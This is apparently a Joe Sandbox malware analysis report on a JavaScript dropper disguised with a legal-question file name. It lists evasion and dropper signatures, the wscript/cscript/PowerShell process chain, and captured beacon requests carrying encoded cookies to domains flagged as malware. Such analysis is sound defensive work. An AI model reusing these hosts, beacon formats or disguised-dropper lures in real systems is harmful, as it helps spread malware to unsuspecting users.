Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
does virginia have a no chase law for motorcycles 62848.js

Overview

General Information

Sample name:does virginia have a no chase law for motorcycles 62848.js
Analysis ID:1436973
MD5:d9070baada2376260e5e4f3140828c66
SHA1:2d6de9cb4b27f4feea210451f682e18b221310c4
SHA256:c4951a5ec93bdec52c8b8b9d84bb143b8062f5eb9ffad8c740ed19fbead9dc4d
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Loading BitLocker PowerShell Module
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6456 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5536 cmdline: C:\Windows\system32\wscript.EXE SOCIOL~1.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 6804 cmdline: "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6776 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 7060 cmdline: C:\Windows\system32\wscript.EXE SOCIOL~1.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 2848 cmdline: "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3852 cmdline: powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js", CommandLine|base64offset|contains: *x, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js", ProcessId: 6456, ProcessName: wscript.exe
Sigma detected: Use NTFS Short Name in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE SOCIOL~1.JS, CommandLine: C:\Windows\system32\wscript.EXE SOCIOL~1.JS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE SOCIOL~1.JS, ProcessId: 5536, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js", CommandLine|base64offset|contains: *x, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js", ProcessId: 6456, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell, CommandLine: powershell, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 6804, ParentProcessName: cscript.exe, ProcessCommandLine: powershell, ProcessId: 6776, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://crackedroom.com/Avira URL Cloud: Label: malware
Source: https://rainmeter-skins.com/Avira URL Cloud: Label: malware
Source: unknownHTTPS traffic detected: 50.116.62.225:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.38.249.148:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZVDRbsMgDPyV8QP7h6xrtT5U7ZJKeUbESVEAI5uk6cTHz5RtLxMPPvDdcXYTo7NGJ4vhQNrDB3LKSi+DxWHKqtn01+x6nvvPcwDdHNqD2bIyGG5PomFDNj4BMUtJo8eQ1aC5Og3OVeZw91nBFh0SUFYjhjTQWnvHwUFWjnWxOIFHerzs0EcCZlvszuNoDewk6XzFdpGXiHcgvoFzWbUwWU70ELSEZD28Ec7lkw40mVsTY1YMtIqF+HcT+T9CMdhvEchCMD/Ds62p2GtKMh9AKJeSjSOi41WESXonCMs/8WqquntwAv9bO0jJhkksrrClY4hLqvy7DXIqcDiVYXsbuiRben0G70/H5r25CPD2Qmu3F2pd+jc3oAz/uwEAAJ8ThIPsMxH3; 9283A9EB0C2=c2FsmXec0dAfiwgAAAAAAAQA7ddRCoJAFIXhrVwXUHsYAquHilLwTZjkZoM6V2ZuZOHiKyFyB72c13O+Dfym71tXWXXi02A73kjUMmNV5+s4Jmawz6YtYlMcD56tSU9pNZR7vlNuz7SgtUjdMq2uQToGBwcHBwcHBwcHBwcH/y/PHlG5+0bdrO5yHnTr+5tO1bdzVZAoF6XPTtNB5teHY1I4n6kEXr7XGZ+2F5SU0oFJDgAAnxOEg+wzEfc=; 9283A9EB0C3=c2FsmXec0dAfiwgAAAAAAAQAXVLbkqIwEP2VzA9QwmxtzSuQEG5CuIQob4hRmUViBWvGrZqP33bQQfct55w+fbobzPLQjYi5Xy9mLtu/bS+R0w2AXDWcteoRawbZA276nRpGeMTdRje6k/B+/b8okedPpf98vVhOWHuMCZuVxvH0+kyctrtn4tKPl2tknUUFxkuRg7xVckQfnd53Q9egQ/MhUYMGhdpDM0rUN59opzQ6qrPS32OP6Lf19uvNeL/OiDnHJXdqT0CnGRjvp/0zcUsmhIoV9ytOQZ6BsVXt5Zm5G7x07TlpvLKv8g/4MczMFPlATB0skoq8YpnrFrd7EFG7FU1SUd49MzGd8IH4tizIpb2e3aL5qsZRVGHHOA1gNf0sdHK8jjABEGLsL5mLeQilM5hSzCgOal4EGUmu39ZLWYpplfpQOoMp30wqUdssK7IY1Bncl35gpo0S4a4cFvB1MI1lJeslZJNgad86MjvOKXcrAnlmkRVhRByBSyidwb19mWEv9BkP+G3JSmCPRRRzD9Sa0igpeJSySV3YW7WRyG612jRnwF6n5U5BowVVag+/uXvQ6ij/AQxkKIcAAwAAnxOEg+wzEfc=; 9283A9EB0C4=c2FsmXec0dAfiwgAAAAAAAQAc44zMjA2NjQ3srQwNDcHADtYo6IOAAAAnxOEg+wzEfc=Host: rainmeter-skins.comConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZZBBbsMgEEWvUi7QO7hpomYRJbUjeY3w2EEGBs2MHafi8IXQdlOxmA/8efyhidFZo8ViOJD28IEsSellsDhMSTWb/ppdz3P/eQ6gm0N7MFtSBsPtaTRsyManIOZcZPQYkho0V9LgXHUOd58UbNEhASU1YpCB1np3HBwk5VgXxAk80uNlhz4SMNuCO4+jNbDLSecrtks+iXgH4hs4l1QLk2WhR1ZLEOvhjXAuj3SgydyaGJNioDUjMr+byP8ZCmC/RSALwfwMz7amYq9J8nwAoWxKNo6IjtfcKPnuBGH517ya2t09WMD/1g5EbJgy4gqbHENcpPrvNuRVhcOpDNvb0En+pddn8P50bN6bSxbeXmjt9t+PqXtVsgEAAJ8ThIPsMxH3; 9283A9EB0C2=c2FsmXec0dAfiwgAAAAAAAQA7ddRCoJAFIXhrVwXUHsYAquHilLwTZjkZoM6V2ZuZOHiKyFyB72c13O+Dfym71tXWXXi02A73kjUMmNV5+s4Jmawz6YtYlMcD56tSU9pNZR7vlNuz7SgtUjdMq2uQToGBwcHBwcHBwcHBwcH/y/PHlG5+0bdrO5yHnTr+5tO1bdzVZAoF6XPTtNB5teHY1I4n6kEXr7XGZ+2F5SU0oFJDgAAnxOEg+wzEfc=; 9283A9EB0C3=c2FsmXec0dAfiwgAAAAAAAQAXVLbkqIwEP2VzA9QwmxtzSuQEG5CuIQob4hRmUViBWvGrZqP33bQQfct55w+fbobzPLQjYi5Xy9mLtu/bS+R0w2AXDWcteoRawbZA276nRpGeMTdRje6k/B+/b8okedPpf98vVhOWHuMCZuVxvH0+kyctrtn4tKPl2tknUUFxkuRg7xVckQfnd53Q9egQ/MhUYMGhdpDM0rUN59opzQ6qrPS32OP6Lf19uvNeL/OiDnHJXdqT0CnGRjvp/0zcUsmhIoV9ytOQZ6BsVXt5Zm5G7x07TlpvLKv8g/4MczMFPlATB0skoq8YpnrFrd7EFG7FU1SUd49MzGd8IH4tizIpb2e3aL5qsZRVGHHOA1gNf0sdHK8jjABEGLsL5mLeQilM5hSzCgOal4EGUmu39ZLWYpplfpQOoMp30wqUdssK7IY1Bncl35gpo0S4a4cFvB1MI1lJeslZJNgad86MjvOKXcrAnlmkRVhRByBSyidwb19mWEv9BkP+G3JSmCPRRRzD9Sa0igpeJSySV3YW7WRyG612jRnwF6n5U5BowVVag+/uXvQ6ij/AQxkKIcAAwAAnxOEg+wzEfc=; 9283A9EB0C4=c2FsmXec0dAfiwgAAAAAAAQAc44zMjA2NjQ3srQwNDcHADtYo6IOAAAAnxOEg+wzEfc=Host: crackedroom.comConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZZBBbsMgEEWvUi7QO7hpomYRJbUjeY3w2EEGBs2MHafi8IXQdlOxmA/8efyhidFZo8ViOJD28IEsSellsDhMSTWb/ppdz3P/eQ6gm0N7MFtSBsPtaTRsyManIOZcZPQYkho0V9LgXHUOd58UbNEhASU1YpCB1np3HBwk5VgXxAk80uNlhz4SMNuCO4+jNbDLSecrtks+iXgH4hs4l1QLk2WhR1ZLEOvhjXAuj3SgydyaGJNioDUjMr+byP8ZCmC/RSALwfwMz7amYq9J8nwAoWxKNo6IjtfcKPnuBGH517ya2t09WMD/1g5EbJgy4gqbHENcpPrvNuRVhcOpDNvb0En+pddn8P50bN6bSxbeXmjt9t+PqXtVsgEAAJ8ThIPsMxH3; 9283A9EB0C2=c2FsmXec0dAfiwgAAAAAAAQA7ddRCoJAFIXhrVwXUHsYAquHilLwTZjkZoM6V2ZuZOHiKyFyB72c13O+Dfym71tXWXXi02A73kjUMmNV5+s4Jmawz6YtYlMcD56tSU9pNZR7vlNuz7SgtUjdMq2uQToGBwcHBwcHBwcHBwcH/y/PHlG5+0bdrO5yHnTr+5tO1bdzVZAoF6XPTtNB5teHY1I4n6kEXr7XGZ+2F5SU0oFJDgAAnxOEg+wzEfc=; 9283A9EB0C3=c2FsmXec0dAfiwgAAAAAAAQAXVLbkqIwEP2VzA9QwmxtzSuQEG5CuIQob4hRmUViBWvGrZqP33bQQfct55w+fbobzPLQjYi5Xy9mLtu/bS+R0w2AXDWcteoRawbZA276nRpGeMTdRje6k/B+/b8okedPpf98vVhOWHuMCZuVxvH0+kyctrtn4tKPl2tknUUFxkuRg7xVckQfnd53Q9egQ/MhUYMGhdpDM0rUN59opzQ6qrPS32OP6Lf19uvNeL/OiDnHJXdqT0CnGRjvp/0zcUsmhIoV9ytOQZ6BsVXt5Zm5G7x07TlpvLKv8g/4MczMFPlATB0skoq8YpnrFrd7EFG7FU1SUd49MzGd8IH4tizIpb2e3aL5qsZRVGHHOA1gNf0sdHK8jjABEGLsL5mLeQilM5hSzCgOal4EGUmu39ZLWYpplfpQOoMp30wqUdssK7IY1Bncl35gpo0S4a4cFvB1MI1lJeslZJNgad86MjvOKXcrAnlmkRVhRByBSyidwb19mWEv9BkP+G3JSmCPRRRzD9Sa0igpeJSySV3YW7WRyG612jRnwF6n5U5BowVVag+/uXvQ6ij/AQxkKIcAAwAAnxOEg+wzEfc=; 9283A9EB0C4=c2FsmXec0dAfiwgAAAAAAAQAc44zMjA2NjQ3srQwNDcHADtYo6IOAAAAnxOEg+wzEfc=Host: www.xn--operation-wstenfuchs-zec.deConnection: Close
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZVDRbsMgDPyV8QP7h6xrtT5U7ZJKeUbESVEAI5uk6cTHz5RtLxMPPvDdcXYTo7NGJ4vhQNrDB3LKSi+DxWHKqtn01+x6nvvPcwDdHNqD2bIyGG5PomFDNj4BMUtJo8eQ1aC5Og3OVeZw91nBFh0SUFYjhjTQWnvHwUFWjnWxOIFHerzs0EcCZlvszuNoDewk6XzFdpGXiHcgvoFzWbUwWU70ELSEZD28Ec7lkw40mVsTY1YMtIqF+HcT+T9CMdhvEchCMD/Ds62p2GtKMh9AKJeSjSOi41WESXonCMs/8WqquntwAv9bO0jJhkksrrClY4hLqvy7DXIqcDiVYXsbuiRben0G70/H5r25CPD2Qmu3F2pd+jc3oAz/uwEAAJ8ThIPsMxH3; 9283A9EB0C2=c2FsmXec0dAfiwgAAAAAAAQA7ddRCoJAFIXhrVwXUHsYAquHilLwTZjkZoM6V2ZuZOHiKyFyB72c13O+Dfym71tXWXXi02A73kjUMmNV5+s4Jmawz6YtYlMcD56tSU9pNZR7vlNuz7SgtUjdMq2uQToGBwcHBwcHBwcHBwcH/y/PHlG5+0bdrO5yHnTr+5tO1bdzVZAoF6XPTtNB5teHY1I4n6kEXr7XGZ+2F5SU0oFJDgAAnxOEg+wzEfc=; 